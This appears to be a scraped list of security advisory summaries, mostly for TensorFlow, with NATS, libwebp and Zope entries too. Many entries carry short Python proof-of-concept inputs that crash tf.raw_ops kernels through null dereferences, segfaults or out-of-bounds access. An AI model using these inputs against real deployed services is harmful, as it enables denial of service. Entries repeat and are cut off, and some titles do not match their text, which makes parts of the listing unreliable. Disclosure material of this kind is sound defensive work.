Due to lack of validation in tf.raw_ops.CTCBeamSearchDecoder, an attacker can trigger denial of service via segmentation faults: import tensorflow as tf inputs = tf.constant([], shape=[18, 8, 0], dtype=tf.float32) sequence_length = tf.constant([11, -43, -92, 11, -89, -83, -35, -100], shape=[8], dtype=tf.int32) beam_width = 10 top_paths = 3 merge_repeated = True tf.raw_ops.CTCBeamSearchDecoder( inputs=inputs, sequence_length=sequence_length, beam_width=beam_width, top_paths=top_paths, merge_repeated=merge_repeated)

Segfault in `CTCBeamSearchDecoder`

Due to lack of validation in tf.raw_ops.CTCBeamSearchDecoder, an attacker can trigger denial of service via segmentation faults: import tensorflow as tf inputs = tf.constant([], shape=[18, 8, 0], dtype=tf.float32) sequence_length = tf.constant([11, -43, -92, 11, -89, -83, -35, -100], shape=[8], dtype=tf.int32) beam_width = 10 top_paths = 3 merge_repeated = True tf.raw_ops.CTCBeamSearchDecoder( inputs=inputs, sequence_length=sequence_length, beam_width=beam_width, top_paths=top_paths, merge_repeated=merge_repeated)

Reference binding to nullptr in `SdcaOptimizer`

The implementation of tf.raw_ops.SdcaOptimizer triggers undefined behavior due to dereferencing a null pointer: import tensorflow as tf sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_values = [] dense_features = [] dense_weights = [] example_weights = tf.constant((0.0), dtype=tf.float32) example_labels = tf.constant((0.0), dtype=tf.float32) sparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)] example_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], …

Reference binding to nullptr in `SdcaOptimizer`

The implementation of tf.raw_ops.SdcaOptimizer triggers undefined behavior due to dereferencing a null pointer: import tensorflow as tf sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_values = [] dense_features = [] dense_weights = [] example_weights = tf.constant((0.0), dtype=tf.float32) example_labels = tf.constant((0.0), dtype=tf.float32) sparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)] example_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], …

Reference binding to nullptr in `SdcaOptimizer`

The implementation of tf.raw_ops.SdcaOptimizer triggers undefined behavior due to dereferencing a null pointer: import tensorflow as tf sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_values = [] dense_features = [] dense_weights = [] example_weights = tf.constant((0.0), dtype=tf.float32) example_labels = tf.constant((0.0), dtype=tf.float32) sparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)] example_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], …

Reference binding to null pointer in `MatrixDiag*` ops

The implementation of MatrixDiag* operations does not validate that the tensor arguments are non-empty: num_rows = context->input(2).flat<int32>()(0); num_cols = context->input(3).flat<int32>()(0); padding_value = context->input(4).flat<T>()(0); Thus, users can trigger null pointer dereferences if any of the above tensors are null: import tensorflow as tf d = tf.convert_to_tensor([],dtype=tf.float32) p = tf.convert_to_tensor([],dtype=tf.float32) tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p) Changing from tf.raw_ops.MatrixDiagV2 to tf.raw_ops.MatrixDiagV3 still reproduces the issue.

Reference binding to null pointer in `MatrixDiag*` ops

The implementation of MatrixDiag* operations does not validate that the tensor arguments are non-empty: num_rows = context->input(2).flat<int32>()(0); num_cols = context->input(3).flat<int32>()(0); padding_value = context->input(4).flat<T>()(0); Thus, users can trigger null pointer dereferences if any of the above tensors are null: import tensorflow as tf d = tf.convert_to_tensor([],dtype=tf.float32) p = tf.convert_to_tensor([],dtype=tf.float32) tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p) Changing from tf.raw_ops.MatrixDiagV2 to tf.raw_ops.MatrixDiagV3 still reproduces the issue.

Reference binding to null pointer in `MatrixDiag*` ops

The implementation of MatrixDiag* operations does not validate that the tensor arguments are non-empty: num_rows = context->input(2).flat<int32>()(0); num_cols = context->input(3).flat<int32>()(0); padding_value = context->input(4).flat<T>()(0); Thus, users can trigger null pointer dereferences if any of the above tensors are null: import tensorflow as tf d = tf.convert_to_tensor([],dtype=tf.float32) p = tf.convert_to_tensor([],dtype=tf.float32) tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p) Changing from tf.raw_ops.MatrixDiagV2 to tf.raw_ops.MatrixDiagV3 still reproduces the issue.

Reference binding to null in `ParameterizedTruncatedNormal`

An attacker can trigger undefined behavior by binding to null pointer in tf.raw_ops.ParameterizedTruncatedNormal: import tensorflow as tf shape = tf.constant([], shape=[0], dtype=tf.int32) means = tf.constant((1), dtype=tf.float32) stdevs = tf.constant((1), dtype=tf.float32) minvals = tf.constant((1), dtype=tf.float32) maxvals = tf.constant((1), dtype=tf.float32) tf.raw_ops.ParameterizedTruncatedNormal( shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals)

Reference binding to null in `ParameterizedTruncatedNormal`

An attacker can trigger undefined behavior by binding to null pointer in tf.raw_ops.ParameterizedTruncatedNormal: import tensorflow as tf shape = tf.constant([], shape=[0], dtype=tf.int32) means = tf.constant((1), dtype=tf.float32) stdevs = tf.constant((1), dtype=tf.float32) minvals = tf.constant((1), dtype=tf.float32) maxvals = tf.constant((1), dtype=tf.float32) tf.raw_ops.ParameterizedTruncatedNormal( shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals)

Reference binding to null in `ParameterizedTruncatedNormal`

An attacker can trigger undefined behavior by binding to null pointer in tf.raw_ops.ParameterizedTruncatedNormal: import tensorflow as tf shape = tf.constant([], shape=[0], dtype=tf.int32) means = tf.constant((1), dtype=tf.float32) stdevs = tf.constant((1), dtype=tf.float32) minvals = tf.constant((1), dtype=tf.float32) maxvals = tf.constant((1), dtype=tf.float32) tf.raw_ops.ParameterizedTruncatedNormal( shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals)

RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be

A security-sensitive bug was discovered by Open Source Developer Erik Sundell of Sundell Open Source Consulting AB. The functions RandomAlphaNumeric(int) and CryptoRandomAlphaNumeric(int) are not as random as they should be. Small values of int in the functions above will return a smaller subset of results than they should. For example, RandomAlphaNumeric(1) will always return a digit in the 0-9 range, while RandomAlphaNumeric(4) will return around ~7 million of the ~13M …

Path Traversal

Untrusted users should not be assigned the Zope Manager role and adding/editing Zope Page Templates through the web should be restricted to trusted users only.

Overflow/denial of service in `tf.raw_ops.ReverseSequence`

The implementation of tf.raw_ops.ReverseSequence allows for stack overflow and/or CHECK-fail based denial of service. import tensorflow as tf input = tf.zeros([1, 1, 1], dtype=tf.int32) seq_lengths = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.ReverseSequence( input=input, seq_lengths=seq_lengths, seq_dim=-2, batch_dim=0)

Overflow/denial of service in `tf.raw_ops.ReverseSequence`

The implementation of tf.raw_ops.ReverseSequence allows for stack overflow and/or CHECK-fail based denial of service. import tensorflow as tf input = tf.zeros([1, 1, 1], dtype=tf.int32) seq_lengths = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.ReverseSequence( input=input, seq_lengths=seq_lengths, seq_dim=-2, batch_dim=0)

Overflow/denial of service in `tf.raw_ops.ReverseSequence`

The implementation of tf.raw_ops.ReverseSequence allows for stack overflow and/or CHECK-fail based denial of service. import tensorflow as tf input = tf.zeros([1, 1, 1], dtype=tf.int32) seq_lengths = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.ReverseSequence( input=input, seq_lengths=seq_lengths, seq_dim=-2, batch_dim=0)

Out-of-bounds Write

A heap-based buffer overflow in function WebPDecodeRGBInto is possible due to an invalid check for buffer size. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

Out-of-bounds Read

An out-of-bounds read was found in function ChunkVerifyAndAssign. The highest threat from this vulnerability is to data confidentiality and to the service availability.

Out-of-bounds Read

An out-of-bounds read was found in function ChunkAssignData. The highest threat from this vulnerability is to data confidentiality and to the service availability.

OOB read in `MatrixTriangularSolve`

The implementation of MatrixTriangularSolve fails to terminate kernel execution if one validation condition fails: void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) override { OP_REQUIRES( ctx, in0.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims())); OP_REQUIRES( ctx, in1.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims())); } void Compute(OpKernelContext* ctx) override { const Tensor& in0 = ctx->input(0); const Tensor& in1 = ctx->input(1); ValidateInputTensors(ctx, in0, in1); …

OOB read in `MatrixTriangularSolve`

The implementation of MatrixTriangularSolve fails to terminate kernel execution if one validation condition fails: void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) override { OP_REQUIRES( ctx, in0.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims())); OP_REQUIRES( ctx, in1.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims())); } void Compute(OpKernelContext* ctx) override { const Tensor& in0 = ctx->input(0); const Tensor& in1 = ctx->input(1); ValidateInputTensors(ctx, in0, in1); …

OOB read in `MatrixTriangularSolve`

The implementation of MatrixTriangularSolve fails to terminate kernel execution if one validation condition fails: void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) override { OP_REQUIRES( ctx, in0.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims())); OP_REQUIRES( ctx, in1.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims())); } void Compute(OpKernelContext* ctx) override { const Tensor& in0 = ctx->input(0); const Tensor& in1 = ctx->input(1); ValidateInputTensors(ctx, in0, in1); …

Null pointer dereference via invalid Ragged Tensors

Calling tf.raw_ops.RaggedTensorToVariant with arguments specifying an invalid ragged tensor results in a null pointer dereference: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1]) import tensorflow as tf input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 2, …

Null pointer dereference via invalid Ragged Tensors

Calling tf.raw_ops.RaggedTensorToVariant with arguments specifying an invalid ragged tensor results in a null pointer dereference: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1]) import tensorflow as tf input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 2, …

Null pointer dereference via invalid Ragged Tensors

Calling tf.raw_ops.RaggedTensorToVariant with arguments specifying an invalid ragged tensor results in a null pointer dereference: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1]) import tensorflow as tf input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 2, …

Null pointer dereference in TFLite's `Reshape` operator

The fix for CVE-2020-15209 missed the case when the target shape of Reshape operator is given by the elements of a 1-D tensor. As such, the fix for the vulnerability allowed passing a null-buffer-backed tensor with a 1D shape: if (tensor->data.raw == nullptr && tensor->bytes > 0) { if (registration.builtin_code == kTfLiteBuiltinReshape && i == 1) { // In general, having a tensor here with no buffer will be an …

Null pointer dereference in TFLite's `Reshape` operator

The fix for CVE-2020-15209 missed the case when the target shape of Reshape operator is given by the elements of a 1-D tensor. As such, the fix for the vulnerability allowed passing a null-buffer-backed tensor with a 1D shape: if (tensor->data.raw == nullptr && tensor->bytes > 0) { if (registration.builtin_code == kTfLiteBuiltinReshape && i == 1) { // In general, having a tensor here with no buffer will be an …

Null pointer dereference in TFLite's `Reshape` operator

The fix for CVE-2020-15209 missed the case when the target shape of Reshape operator is given by the elements of a 1-D tensor. As such, the fix for the vulnerability allowed passing a null-buffer-backed tensor with a 1D shape: if (tensor->data.raw == nullptr && tensor->bytes > 0) { if (registration.builtin_code == kTfLiteBuiltinReshape && i == 1) { // In general, having a tensor here with no buffer will be an …

Null pointer dereference in `StringNGrams`

An attacker can trigger a dereference of a null pointer in tf.raw_ops.StringNGrams: import tensorflow as tf data=tf.constant([''] * 11, shape=[11], dtype=tf.string) splits = [0]*115 splits.append(3) data_splits=tf.constant(splits, shape=[116], dtype=tf.int64) tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss', ngram_widths=[7,6,11], left_pad='ABCDE', right_pad=b'ZYXWVU', pad_width=50, preserve_short_sequences=True)

Null pointer dereference in `StringNGrams`

An attacker can trigger a dereference of a null pointer in tf.raw_ops.StringNGrams: import tensorflow as tf data=tf.constant([''] * 11, shape=[11], dtype=tf.string) splits = [0]*115 splits.append(3) data_splits=tf.constant(splits, shape=[116], dtype=tf.int64) tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss', ngram_widths=[7,6,11], left_pad='ABCDE', right_pad=b'ZYXWVU', pad_width=50, preserve_short_sequences=True)

Null pointer dereference in `StringNGrams`

An attacker can trigger a dereference of a null pointer in tf.raw_ops.StringNGrams: import tensorflow as tf data=tf.constant([''] * 11, shape=[11], dtype=tf.string) splits = [0]*115 splits.append(3) data_splits=tf.constant(splits, shape=[116], dtype=tf.int64) tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss', ngram_widths=[7,6,11], left_pad='ABCDE', right_pad=b'ZYXWVU', pad_width=50, preserve_short_sequences=True)

Null pointer dereference in `SparseFillEmptyRows`

An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.SparseFillEmptyRows: import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) dense_shape = tf.constant([], shape=[0], dtype=tf.int64) default_value = 0 tf.raw_ops.SparseFillEmptyRows( indices=indices, values=values, dense_shape=dense_shape, default_value=default_value)

Null pointer dereference in `SparseFillEmptyRows`

An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.SparseFillEmptyRows: import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) dense_shape = tf.constant([], shape=[0], dtype=tf.int64) default_value = 0 tf.raw_ops.SparseFillEmptyRows( indices=indices, values=values, dense_shape=dense_shape, default_value=default_value)

Null pointer dereference in `SparseFillEmptyRows`

An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.SparseFillEmptyRows: import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) dense_shape = tf.constant([], shape=[0], dtype=tf.int64) default_value = 0 tf.raw_ops.SparseFillEmptyRows( indices=indices, values=values, dense_shape=dense_shape, default_value=default_value)

Null pointer dereference in `EditDistance`

An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.EditDistance: import tensorflow as tf hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64) hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32) hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64) truth_values = tf.constant([], shape=[0], dtype=tf.float32) truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) tf.raw_ops.EditDistance( hypothesis_indices=hypothesis_indices, hypothesis_values=hypothesis_values, hypothesis_shape=hypothesis_shape, truth_indices=truth_indices, truth_values=truth_values, truth_shape=truth_shape, normalize=True)

Null pointer dereference in `EditDistance`

An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.EditDistance: import tensorflow as tf hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64) hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32) hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64) truth_values = tf.constant([], shape=[0], dtype=tf.float32) truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) tf.raw_ops.EditDistance( hypothesis_indices=hypothesis_indices, hypothesis_values=hypothesis_values, hypothesis_shape=hypothesis_shape, truth_indices=truth_indices, truth_values=truth_values, truth_shape=truth_shape, normalize=True)

Null pointer dereference in `EditDistance`

An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.EditDistance: import tensorflow as tf hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64) hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32) hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64) truth_values = tf.constant([], shape=[0], dtype=tf.float32) truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) tf.raw_ops.EditDistance( hypothesis_indices=hypothesis_indices, hypothesis_values=hypothesis_values, hypothesis_shape=hypothesis_shape, truth_indices=truth_indices, truth_values=truth_values, truth_shape=truth_shape, normalize=True)

Nil dereference in NATS JWT, DoS of nats-server

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26521.txt) Problem Description The NATS account system has an Operator trusted by the servers, which signs Accounts, and each Account can then create and sign Users within their account. The Operator should be able to safely issue Accounts to other entities which it does not fully trust. A malicious Account could create and sign a User JWT with a state not created by the normal tooling, …

Nil dereference in NATS JWT causing DoS of nats-server

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26521.txt) Problem Description The NATS account system has an Operator trusted by the servers, which signs Accounts, and each Account can then create and sign Users within their account. The Operator should be able to safely issue Accounts to other entities which it does not fully trust. A malicious Account could create and sign a User JWT with a state not created by the normal tooling, …

Memory corruption in `DrawBoundingBoxesV2`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf images = tf.fill([10, 96, 0, 1], 0.) boxes = tf.fill([10, 53, 0], 0.) colors = tf.fill([0, 1], 0.) tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors)

Memory corruption in `DrawBoundingBoxesV2`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf images = tf.fill([10, 96, 0, 1], 0.) boxes = tf.fill([10, 53, 0], 0.) colors = tf.fill([0, 1], 0.) tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors)

Memory corruption in `DrawBoundingBoxesV2`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf images = tf.fill([10, 96, 0, 1], 0.) boxes = tf.fill([10, 53, 0], 0.) colors = tf.fill([0, 1], 0.) tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors)

Lack of validation in `SparseDenseCwiseMul`

Due to lack of validation in tf.raw_ops.SparseDenseCwiseMul, an attacker can trigger denial of service via CHECK-fails or accesses to outside the bounds of heap allocated data: import tensorflow as tf indices = tf.constant([], shape=[10, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) shape = tf.constant([0, 0], shape=[2], dtype=tf.int64) dense = tf.constant([], shape=[0], dtype=tf.int64) tf.raw_ops.SparseDenseCwiseMul( sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense)

Lack of validation in `SparseDenseCwiseMul`

Due to lack of validation in tf.raw_ops.SparseDenseCwiseMul, an attacker can trigger denial of service via CHECK-fails or accesses to outside the bounds of heap allocated data: import tensorflow as tf indices = tf.constant([], shape=[10, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) shape = tf.constant([0, 0], shape=[2], dtype=tf.int64) dense = tf.constant([], shape=[0], dtype=tf.int64) tf.raw_ops.SparseDenseCwiseMul( sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense)

Lack of validation in `SparseDenseCwiseMul`

Due to lack of validation in tf.raw_ops.SparseDenseCwiseMul, an attacker can trigger denial of service via CHECK-fails or accesses to outside the bounds of heap allocated data: import tensorflow as tf indices = tf.constant([], shape=[10, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) shape = tf.constant([0, 0], shape=[2], dtype=tf.int64) dense = tf.constant([], shape=[0], dtype=tf.int64) tf.raw_ops.SparseDenseCwiseMul( sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense)

Invalid validation in `SparseMatrixSparseCholesky`

An attacker can trigger a null pointer dereference by providing an invalid permutation to tf.raw_ops.SparseMatrixSparseCholesky: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([-10.0], dtype=np.float32) dense_shape = [1, 1] st = tf.SparseTensor(indices_array, value_array, dense_shape) input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape) permutation = tf.constant([], shape=[1, 0], dtype=tf.int32) tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32)

Invalid validation in `SparseMatrixSparseCholesky`

An attacker can trigger a null pointer dereference by providing an invalid permutation to tf.raw_ops.SparseMatrixSparseCholesky: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([-10.0], dtype=np.float32) dense_shape = [1, 1] st = tf.SparseTensor(indices_array, value_array, dense_shape) input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape) permutation = tf.constant([], shape=[1, 0], dtype=tf.int32) tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32)

Invalid validation in `SparseMatrixSparseCholesky`

An attacker can trigger a null pointer dereference by providing an invalid permutation to tf.raw_ops.SparseMatrixSparseCholesky: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([-10.0], dtype=np.float32) dense_shape = [1, 1] st = tf.SparseTensor(indices_array, value_array, dense_shape) input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape) permutation = tf.constant([], shape=[1, 0], dtype=tf.int32) tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32)

Invalid validation in `QuantizeAndDequantizeV2`

The validation in tf.raw_ops.QuantizeAndDequantizeV2 allows invalid values for axis argument: import tensorflow as tf input_tensor = tf.constant([0.0], shape=[1], dtype=float) input_min = tf.constant(-10.0) input_max = tf.constant(-10.0) tf.raw_ops.QuantizeAndDequantizeV2( input=input_tensor, input_min=input_min, input_max=input_max, signed_input=False, num_bits=1, range_given=False, round_mode='HALF_TO_EVEN', narrow_range=False, axis=-2)

Invalid validation in `QuantizeAndDequantizeV2`

The validation in tf.raw_ops.QuantizeAndDequantizeV2 allows invalid values for axis argument: import tensorflow as tf input_tensor = tf.constant([0.0], shape=[1], dtype=float) input_min = tf.constant(-10.0) input_max = tf.constant(-10.0) tf.raw_ops.QuantizeAndDequantizeV2( input=input_tensor, input_min=input_min, input_max=input_max, signed_input=False, num_bits=1, range_given=False, round_mode='HALF_TO_EVEN', narrow_range=False, axis=-2)

Invalid validation in `QuantizeAndDequantizeV2`

The validation in tf.raw_ops.QuantizeAndDequantizeV2 allows invalid values for axis argument: import tensorflow as tf input_tensor = tf.constant([0.0], shape=[1], dtype=float) input_min = tf.constant(-10.0) input_max = tf.constant(-10.0) tf.raw_ops.QuantizeAndDequantizeV2( input=input_tensor, input_min=input_min, input_max=input_max, signed_input=False, num_bits=1, range_given=False, round_mode='HALF_TO_EVEN', narrow_range=False, axis=-2)

Interpreter crash from `tf.io.decode_raw`

The implementation of tf.io.decode_raw produces incorrect results and crashes the Python interpreter when combining fixed_length and wider datatypes. import tensorflow as tf tf.io.decode_raw(tf.constant(["1","2","3","4"]), tf.uint16, fixed_length=4)

Integer overflow in TFLite memory allocation

The TFLite code for allocating TFLiteIntArrays is vulnerable to an integer overflow issue: int TfLiteIntArrayGetSizeInBytes(int size) { static TfLiteIntArray dummy; return sizeof(dummy) + sizeof(dummy.data[0]) * size; } An attacker can craft a model such that the size multiplier is so large that the return value overflows the int datatype and becomes negative. In turn, this results in invalid value being given to malloc: TfLiteIntArray* TfLiteIntArrayCreate(int size) { TfLiteIntArray* ret = …

Integer overflow in TFLite memory allocation

The TFLite code for allocating TFLiteIntArrays is vulnerable to an integer overflow issue: int TfLiteIntArrayGetSizeInBytes(int size) { static TfLiteIntArray dummy; return sizeof(dummy) + sizeof(dummy.data[0]) * size; } An attacker can craft a model such that the size multiplier is so large that the return value overflows the int datatype and becomes negative. In turn, this results in invalid value being given to malloc: TfLiteIntArray* TfLiteIntArrayCreate(int size) { TfLiteIntArray* ret = …

Integer overflow in TFLite memory allocation

The TFLite code for allocating TFLiteIntArrays is vulnerable to an integer overflow issue: int TfLiteIntArrayGetSizeInBytes(int size) { static TfLiteIntArray dummy; return sizeof(dummy) + sizeof(dummy.data[0]) * size; } An attacker can craft a model such that the size multiplier is so large that the return value overflows the int datatype and becomes negative. In turn, this results in invalid value being given to malloc: TfLiteIntArray* TfLiteIntArrayCreate(int size) { TfLiteIntArray* ret = …

Integer overflow in TFLite concatentation

The TFLite implementation of concatenation is vulnerable to an integer overflow issue: for (int d = 0; d < t0->dims->size; ++d) { if (d == axis) { sum_axis += t->dims->data[axis]; } else { TF_LITE_ENSURE_EQ(context, t->dims->data[d], t0->dims->data[d]); } } An attacker can craft a model such that the dimensions of one of the concatenation input overflow the values of int. TFLite uses int to represent tensor dimensions, whereas TF uses int64. …

Integer overflow in TFLite concatentation

The TFLite implementation of concatenation is vulnerable to an integer overflow issue: for (int d = 0; d < t0->dims->size; ++d) { if (d == axis) { sum_axis += t->dims->data[axis]; } else { TF_LITE_ENSURE_EQ(context, t->dims->data[d], t0->dims->data[d]); } } An attacker can craft a model such that the dimensions of one of the concatenation input overflow the values of int. TFLite uses int to represent tensor dimensions, whereas TF uses int64. …

Integer overflow in TFLite concatentation

The TFLite implementation of concatenation is vulnerable to an integer overflow issue: for (int d = 0; d < t0->dims->size; ++d) { if (d == axis) { sum_axis += t->dims->data[axis]; } else { TF_LITE_ENSURE_EQ(context, t->dims->data[d], t0->dims->data[d]); } } An attacker can craft a model such that the dimensions of one of the concatenation input overflow the values of int. TFLite uses int to represent tensor dimensions, whereas TF uses int64. …

Incorrect handling of credential expiry by NATS Server

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26892.txt ) Problem Description NATS nats-server through 2020-10-07 has Incorrect Access Control because of how expired credentials are handled. The NATS accounts system has expiration timestamps on credentials; the https://github.com/nats-io/jwt library had an API which encouraged misuse and an IsRevoked() method which misused its own API. A new IsClaimRevoked() method has correct handling and the nats-server has been updated to use this. The old IsRevoked() method …

Incorrect handling of credential expiry by /nats-io/nats-server

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26892.txt ) Problem Description NATS nats-server through 2020-10-07 has Incorrect Access Control because of how expired credentials are handled. The NATS accounts system has expiration timestamps on credentials; the https://github.com/nats-io/jwt library had an API which encouraged misuse and an IsRevoked() method which misused its own API. A new IsClaimRevoked() method has correct handling and the nats-server has been updated to use this. The old IsRevoked() method …

Incorrect Default Permissions

A privilege escalation vulnerability impacting the Google Exposure Notification Verification Server (versions prior to 0.23.1), allows an attacker who (1) has UserWrite permissions and (2) is using a carefully crafted request or malicious proxy, to create another user with higher privileges than their own. This occurs due to insufficient checks on the allowed set of permissions. The new user creation event would be captured in the Event Log.

Incorrect Calculation of Buffer Size

TensorFlow is an end-to-end open source platform for machine learning. An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices. This is because the implementation does a double redirection to access an element of an array allocated on the heap. If the value at indices + 1 is outside the bounds of csr_row_ptr, this results in writing outside of bounds of …

Incomplete validation in `tf.raw_ops.CTCLoss`

